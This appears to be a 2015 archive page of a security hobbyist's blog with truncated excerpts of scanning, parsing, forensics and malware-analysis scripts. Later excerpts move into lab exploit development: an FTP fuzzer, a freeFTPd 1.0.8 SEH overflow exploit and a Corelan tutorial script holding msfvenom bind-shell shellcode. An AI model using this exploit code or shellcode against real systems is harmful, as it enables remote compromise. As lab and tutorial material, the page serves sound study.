Posts

Showing posts from 2015

Using masscan with a configuration file

Recently I was doing some scanning with a tool that is available on github called masscan.  The tool allows you to configure a configuration file and use it by executing 'masscan -c my.conf'.  Below is an example of the configuration file that I was utilizing:

# My Scan
rate =  0.01
output-format = xml
output-filename = scan.xml
ports = 22,23,25,80,443
range = 192.168.5.1-192.168.5.50
retries = 0
http-user-agent = Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.89 Safari/537.36
ping = false
banners = true

The above configuration file allows for when it scans to also pull the banners for a web server.  When it does it will pass the above user agent.

Powershell - Send Email through GMail SMTP Server

I came across an instance where I had to send an email through Powershell.  This is the powershell script that I came up with and tested.

function sendMyEmail ($fromAddress, $toAddress, $subject, $body, $password) {     # The sendEmail function is setup to use a GMail STMP Server with a valid account         $SMTPServer = "smtp.gmail.com"     $SMTPClient = New-Object System.Net.Mail.SmtpClient     $SMTPClient.Host = 'smtp.gmail.com'     $SMTPClient.Port = 587     $SMTPClient.EnableSsl = $true     $SMTPClient.Credentials = New-Object System.Net.NetworkCredential($fromAddress, $password);     $SMTPClient.Send($fromAddress, $toAddress, $subject, $body) }
function gatherInfo {
}
#Main  $smtpInfo = New-Object PSObject -Property @{     fromAddress = $null     toAddress = $null     subject = $null     body = $null     password = $null } $smtpInfo.fromAddress = "myemail@gmail.com" $smtpInfo.toAddress = "mystuff@scriptkitty.work" $smtpInfo.subject = "…

nmap - Storing nmap Scan Information 1 File at a Time

The other day I was faced with a challenge where I needed to store each nmap scan as its own file. I created this quick python script to assist with doing this.
#!/usr/bin/python import sys import os import re scanFile = 'scan.list' def selectScan(nList, dList, sIP, eIP): file = open('scan.list', 'r') for line in file: if '#' not in line: theList = line.split(',') nList.append(theList[0]) dList.append(theList[1]) sIP.append(theList[2]) eIP.append(theList[3].strip()) file.close() print print "Select which scan you would like to perform:" print for i in range(0, len(nList)): print str(i+1) + ". Scan: " + nList[i] + ", Save to Directory: " + dList[i] + ", Start IP: " + sIP[i] + ", End IP: " + eIP[i] print scanSelect = raw_input('Select: ') try: scanSelect = int(scanSelect) scanSelect = scanSelect - 1 except: scanSelect = 9999 return scanSelect d…

Parsing Multiple nmap Scan Output Files into a csv File

Today I was faced with a challenge where I had to parse multiple nmap scans that were saved in a directory.  The format was saved in the regular .nmap output.  The following python script came alive that parses the files and outputs the IP Address, MAC Address and each port that was found into output to the screen that could then be saved as a csv file.

This script depends on the output that is located in the .nmap output and the version of nmap.

#!/usr/bin/python nmapOutputDirectory="scans" import os import re for file in os.listdir(nmapOutputDirectory): portStatusPattern = re.compile("^[0-9]{1,5}\/(tcp|udp)\s*(open|closed)\s*[0-9a-zA-Z- ]{3,}$") macAddrPattern = re.compile(".*([0-9A-Fa-f]{1,2}[:-]){5}[0-9A-Fa-f]{2}.*") portInfoList = [] ipAddress = '' macAddr = '' fileLocation = nmapOutputDirectory + "/" + file f = open(fileLocation, 'r') for line in f: currentLine = line.strip() if "Nmap scan repor…

Python - Vega Conflict Script to Maximize Fleet Sizes based on Fleet Mass

Image
On the side I have been playing a game created by Kixeye called Vega Conflict.  Their description of the game is below:


Stake your claim, command your fleets, and wage epic war in space. Band together with other players in a bloody rebellion to take back the galaxy from the evil VEGA Federation.  CUSTOMIZE YOUR WAR: Different targets call for different strategy, outfit your fleet for victory.  REAL-TIME PvP: Real war doesn’t wait its turn - attack enemies at will in real-time.  BATTLE ANYWHERE: Conflict never ends. Continue your progress on phone, tablet, or in browser.

In the game you progress based on leveling the buildings on your planet.  Currently in the game I have a level 7 Fleet Bay which allows you to have a maximum of 7 Fleets.  Each Fleet can only have a total mass of 10,100.  This presents a difficulty in taking all of the ships that you have built and creating 7 Fleets with as close as you can get the maximum mass for each fleet.   A note on strategy:  The best strategy is …

Python - Built a Maze Creator and a Server to Allow Clients to Connect and Navigate the Maze

Over 2 years ago I participated in a CTF where in one of the challenges you were presented with an IP Address and a port to connect to.  Upon connecting to the port you were presented with some navigational information with 3-5 seconds to make a decision of where to go inside of a maze.

I was impressed by the challenge and decided a couple of days ago I would build it in python.  First I started out with the code to be able to build, save, load, and modify mazes.  The create.py file contains the ability to initialize a maze if you have not.

From a non-privileged account run ./create.py.  You will then be presented with a greeting, then if you would like to load a maze from a file you are prompted to do so.  Then you are prompted for the number of columns and rows you would like.  This then draws the map using a '#' as a character symbolizing a wall that can not be passed through.

Then you can proceed by creating the maze through typing in 'n', 's', 'w'…

Cryptowall 3.0 downloaded and executed from "William_Isabella_resume.doc"

Image
Recently I was provided a phishing email with an attachment called "William_Isabella_resume.doc".  As I had done in the previous post I used "./oledump William_Isabella_resume.doc" to examine the contents for a malicious macro.  Below is the output of that command.

./oledump.py William_Isabella_resume.doc
 A: word/vbaProject.bin
 A1:       375 'PROJECT'
 A2:        41 'PROJECTwm'
 A3: M   40002 'VBA/ThisDocument'
 A4:      8271 'VBA/_VBA_PROJECT'
 A5:       514 'VBA/dir'

As you can see, item A3 contains a macro.  Then by selecting A3, I output the macro to a text file.
./oledump.py -s A3 -v William_Isabella_resume.doc > macro.txt
I immediately started looking at the macro and noticed a pattern of lines that were repeated with varying length of variables but contained a similar structure.  Two examples of the pattern are below:
Dim ACIZjEo8pvcIr As Long, I3wVba3qWHhnCuC As Long ACIZjEo8pvcIr = 80 I3wVba3qWHhnCuC = 19 If ACIZjEo8pvcIr +…

Using oledump.py to pull Malicious Macro's out of Microsoft Word Doc

Image
For the last few months I have been bombarded with Microsoft Word Documents that contain malicious macros.  I wanted to take a couple of minutes and document the use of oledump.py to pull out the malicious macro.  I mainly tear these apart to identify the various indicators of compromise that can be harvested.

Filename: 7ZJ7.doc File Size: 204,800 SHA1: 086ef96c939968e9b149dab81350a2732b2fdb8f MD5:  55687ddebba3665dd44eb7be08dc0c7b Virus Total Detection Ratio: 19/54 Virus Total Link
The tool oledump.py was created by Didier Stevens and he has maintained the tool as this type of malware has evolved.  To read about the command-line options that are available you can run ./oledump.py -h.  To begin to initialize the doc file you run "./oledump.py 7ZJ7.doc".

We can see from the output that there are a total of 17 objects that can be selected.  I am going to hone in on objects 8-10.
I am going to select object 8 and because it is compressed I am going to use another option to deco…

Python script to combine psscan and pslist Output

I was utilizing volatility the other day and was using some command line kung-fu to sort and organize the output from the module for psscan.  That is where this script came about.  Below are the objectives of the script.  Then below the script that is posted are some methods of how I utilized the script.

# Objective of the script:
# - Create a sorted view for psscan output
# - Identify the processes that are currently located in pslist
# - Number the processes in the order they appear in psscan
# - Sort by PIDs in the psscan output

In the below script after you generate the output for the psscan and pslist -P output you need to modify the file names respectively in the below script.

#!/usr/bin/python # Objective of the script: # - Create a sorted view for psscan output # - Identify the processes that are currently located in pslist # - Number the processes in the order they appear in psscan # - Sort by PIDs in the psscan output # Modify the below files for the output that you recei…

Python script to convert an HTTP Web Request to a sqlmap Command

Image
Today I was working with OWASP ZAP and sqlmap for some testing.  I found that for the testing that I was doing I needed a script to automate the creation of the sqlmap command from the input of a HTTP web request.  I will demonstrate how I am utilizing it below:

Below is a screen shot of OWASP ZAP area where the request is shown after it is configured to show a combined view of the header and the content.


This is an example of an HTTP POST request during the login stage of getting into DVWA.  Then inside this box you can right-click, hover over Save Raw, Request, and then click on All.  This will bring up a save dialog box.  Where you saved the below script, create a folder called "requests".  Then save the HTTP Request in that folder.  If you are running Kali you do not need to be root to execute this script.

Here is the script that converts the POST Request into a sqlmap command and then it will execute it upon a key press:

#!/usr/bin/python import os import sys additio…

Fuzzer for freeFTPd 1.0.8

From working with freeFTPd 1.0.8 in the previous post and finding that a buffer overflow could occur on the username field if I enabled logging.  I build the below script to test other functions of the FTP server.  I developed the below fuzzer to identify them, however none surfaced.  I also experimented with unicode characters.

#!/usr/bin/python import socket server = '172.16.102.142' # Change to the IP Address of Windows 7 SP1 VM destPort = 21 hexValues = ["\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x09","\x0a","\x0b","\x0c","\x0d","\x0e","\x0f","\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1a","\x1b","\x1c","\x1d","\x1e&quo…

freeFTPd 1.0.8 - SEH Stack Based Overflow

Image
Exploiting the freeFTPd 1.0.8 server that has an SEH Stack Based Overflow.  This is already documented as a metasploit module and other exploits that have been published.  I have downloaded the vulnerable freeFTPd 1.0.8 server from here.  Then I installed it on Windows XP SP2 with Immunity Debugger.  To configure the freeFTPd server create a user with username of ftp and a password of ftp.  Then enable logging so it writes to a file.

First I created a python script to simulate a logon:

#!/usr/bin/python import socket server = '172.16.104.42' # Change to the IP Address of Windows XP SP2 VM destPort = 21 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, destPort)) # Receive the Banner that is returned after the initial connection print s.recv(1024) # Send the username to login with userString = "USER ftp\r\n" s.send(userString) print userString print s.recv(1024) # Send the password to login with passString = "PASS ftp\r\n&q…

Reviewing Corelan Exploit Writing Part 2

I was reviewing the Corelan Exploit Tutotials Part 2 located here.  Below is the python code that I have created following the tutorial.

#!/usr/bin/python

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x20\x0a\x0d' -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 22 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
buf =  ""
buf += "\xbb\x06\xf1\x81\xb7\xdd\xc3\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x53\x31\x58\x12\x83\xe8\xfc\x03\x5e\xff\x63"
buf += "\x42\xa2\x17\xe1\xad\x5a\xe8\x86\x24\xbf\xd9\x86\x53"
buf += "\xb4\x4a\x37\x17\x98\x66\xbc\x75\x08\xfc\xb0\x51\x3f"
buf += "\xb5\x7f\x84\x0e\x46\xd3\xf4\x11\xc4\x2e\x29\xf1\xf5"
buf += "\xe0\x3c\xf0\x32\x1c\xcc\xa0\xeb\x6a\x63\x54\x9f\x27"
buf += "\xb…